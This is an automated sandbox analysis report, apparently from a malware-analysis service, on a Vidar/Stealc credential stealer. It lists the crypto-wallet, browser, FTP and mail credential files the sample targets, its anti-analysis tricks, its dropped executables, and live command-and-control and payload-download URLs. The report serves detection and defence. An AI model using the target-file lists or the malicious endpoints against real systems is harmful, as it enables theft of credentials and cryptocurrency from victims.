Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe, 00000000.00000002.2400608729.0000000002571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\.finger-print.fpk
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2400608729.0000000002507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 8012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ca32398cd.exe PID: 1336, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2036, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482894 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 117 www.youtube.com 2->117 119 www.wikipedia.org 2->119 121 32 other IPs or domains 2->121 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 149 Antivirus detection for URL or domain 2->149 151 15 other signatures 2->151 10 file.exe 39 2->10         started        15 explorti.exe 2->15         started        17 explorti.exe 2->17         started        19 4 other processes 2->19 signatures3 process4 dnsIp5 123 85.28.47.31, 49710, 49719, 80 GES-ASRU Russian Federation 10->123 125 185.215.113.16, 49713, 49722, 49724 WHOLESALECONNECTIONSNL Portugal 10->125 89 C:\Users\user\AppData\RoamingIJEGDBGDBF.exe, PE32 10->89 dropped 91 C:\Users\user\AppData\RoamingBKJEGDGIJE.exe, PE32 10->91 dropped 93 C:\Users\user\AppData\...\softokn3[1].dll, PE32 10->93 dropped 103 13 other files (9 malicious) 10->103 dropped 167 Detected unpacking (changes PE section rights) 10->167 169 Detected unpacking (overwrites its own PE header) 10->169 171 Tries to steal Mail credentials (via file / registry access) 10->171 183 7 other signatures 10->183 21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        25 WerFault.exe 22 16 10->25         started        127 185.215.113.19, 49754, 80 WHOLESALECONNECTIONSNL Portugal 15->127 129 detectportal.firefox.com 15->129 131 prod.detectportal.prod.cloudops.mozgcp.net 15->131 95 C:\Users\user\AppData\...\7ca32398cd.exe, PE32 15->95 dropped 97 C:\Users\user\AppData\Local\...\random[1].exe, PE32 15->97 dropped 99 C:\Users\user\AppData\Local\...\random[1].exe, PE32 15->99 dropped 101 C:\Users\user\1000003002\5aa32fec17.exe, PE32 15->101 dropped 173 Creates multiple autostart registry keys 15->173 175 Hides threads from debuggers 15->175 177 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->177 28 5aa32fec17.exe 15->28         started        31 7ca32398cd.exe 15->31         started        179 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->179 133 239.255.255.250 unknown Reserved 19->133 181 Maps a DLL or memory area into another process 19->181 33 firefox.exe 19->33         started        36 msedge.exe 19->36         started        38 msedge.exe 19->38         started        40 4 other processes 19->40 file6 signatures7 process8 dnsIp9 42 RoamingBKJEGDGIJE.exe 4 21->42         started        46 conhost.exe 21->46         started        48 RoamingIJEGDBGDBF.exe 4 23->48         started        50 conhost.exe 23->50         started        79 C:\ProgramData\Microsoft\...\Report.wer, Unicode 25->79 dropped 185 Multi AV Scanner detection for dropped file 28->185 187 Detected unpacking (overwrites its own PE header) 28->187 189 Machine Learning detection for dropped file 28->189 52 cmd.exe 28->52         started        191 Detected unpacking (changes PE section rights) 31->191 54 WerFault.exe 31->54         started        105 push.services.mozilla.com 33->105 107 172.217.16.142 GOOGLEUS United States 33->107 113 9 other IPs or domains 33->113 81 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 33->81 dropped 83 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 33->83 dropped 56 firefox.exe 33->56         started        58 firefox.exe 33->58         started        109 www.youtube.com 36->109 111 bzib.nelreports.net 36->111 115 25 other IPs or domains 36->115 file10 signatures11 process12 file13 85 C:\Users\user\AppData\Local\...\axplong.exe, PE32 42->85 dropped 153 Multi AV Scanner detection for dropped file 42->153 155 Detected unpacking (changes PE section rights) 42->155 157 Tries to evade debugger and weak emulator (self modifying code) 42->157 159 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 42->159 60 axplong.exe 12 42->60         started        87 C:\Users\user\AppData\Local\...\explorti.exe, PE32 48->87 dropped 161 Tries to detect virtualization through RDTSC time measurements 48->161 163 Hides threads from debuggers 48->163 165 Tries to detect sandboxes / dynamic malware analysis system (registry check) 48->165 64 explorti.exe 48->64         started        66 chrome.exe 52->66         started        68 msedge.exe 52->68         started        70 conhost.exe 52->70         started        72 firefox.exe 52->72         started        signatures14 process15 dnsIp16 141 telemetry-incoming.r53-2.services.mozilla.com 60->141 193 Multi AV Scanner detection for dropped file 60->193 195 Detected unpacking (changes PE section rights) 60->195 197 Tries to detect sandboxes and other dynamic analysis tools (window names) 60->197 199 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 60->199 201 Tries to evade debugger and weak emulator (self modifying code) 64->201 203 Hides threads from debuggers 64->203 205 Tries to detect sandboxes / dynamic malware analysis system (registry check) 64->205 143 192.168.2.6, 443, 49705, 49710 unknown unknown 66->143 74 chrome.exe 66->74         started        77 msedge.exe 68->77         started        signatures17 process18 dnsIp19 135 www.youtube.com 74->135 137 accounts.youtube.com 74->137 139 5 other IPs or domains 74->139
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.200.0.42
 unknown United States
20940 AKAMAI-ASN1EU false
13.107.246.40
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
85.28.47.31
 unknown Russian Federation
31643 GES-ASRU true
172.253.63.84
 unknown United States
15169 GOOGLEUS false
142.250.64.99
 unknown United States
15169 GOOGLEUS false
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
23.200.0.9
 unknown United States
20940 AKAMAI-ASN1EU false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false
172.217.16.142
 unknown United States
15169 GOOGLEUS false
204.79.197.237
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.250.80.36
 unknown United States
15169 GOOGLEUS false
13.107.21.237
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
185.215.113.19
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.80.78
 unknown United States
15169 GOOGLEUS false
142.251.40.142
 unknown United States
15169 GOOGLEUS false
142.251.167.84
 unknown United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
142.250.72.110
 unknown United States
15169 GOOGLEUS false
143.204.215.18
 services.addons.mozilla.org United States
16509 AMAZON-02US false
172.217.18.14
 play.google.com United States
15169 GOOGLEUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.184.206
 unknown United States
15169 GOOGLEUS false
172.64.41.3
 unknown United States
13335 CLOUDFLARENETUS false
142.251.179.84
 unknown United States
15169 GOOGLEUS false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
142.250.81.225
 unknown United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
142.250.80.99
 unknown United States
15169 GOOGLEUS false
216.58.206.68
 www.google.com United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
142.250.65.227
 unknown United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
23.101.168.44
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.251.35.163
 unknown United States
15169 GOOGLEUS false

Private

IP
192.168.2.6
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.0.35 true
chrome.cloudflare-dns.com 162.159.61.3 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.129 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 143.204.215.18 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 142.250.186.142 true
www3.l.google.com 142.250.184.238 true
play.google.com 172.217.18.14 true
reddit.map.fastly.net 151.101.193.140 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
www.google.com 216.58.206.68 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
push.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
bzib.nelreports.net unknown unknown
accounts.youtube.com unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.19/Vi9leo/index.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.31silence true
  • Avira URL Cloud: safe
 unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.31/8405906461a5200c/nss3.dll true
  • Avira URL Cloud: malware
 unknown
https://www.google.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown
http://185.215.113.16/mine/enter.exe false
  • Avira URL Cloud: phishing
 unknown
https://play.google.com/log?format=json&hasfast=true&authuser=0 false
  • Avira URL Cloud: safe
 unknown
https://play.google.com/log?hasfast=true&authuser=0&format=json false
  • Avira URL Cloud: safe
 unknown